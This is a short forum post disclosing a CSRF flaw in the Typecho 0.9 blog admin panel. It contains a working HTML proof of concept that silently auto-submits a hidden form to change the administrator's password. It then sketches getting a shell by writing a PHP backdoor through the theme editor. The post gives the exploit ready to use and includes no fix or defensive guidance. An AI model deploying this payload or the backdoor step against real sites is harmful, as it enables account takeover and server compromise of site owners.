Typecho 0.9(13.12.12) CSRF修改管理员密码漏洞

xuextx · 帖子由 **xuextx** » 2014年 6月 26日 23:27

[*] 1. Description

http://typecho/admin/profile.php page, Change password form CSRF vul.
http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.

[*] 2. CSRF POC

<div style="display: none;">
<form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="password" value="bug1024"/>
<input type="hidden" name="confirm" value="bug1024" />
<input name="do" type="hidden" value="password" />
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 2000);
</script>

[*] 3. GETSHELL

http://typecho/admin/theme-editor.php page, Write backdoor.

by http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html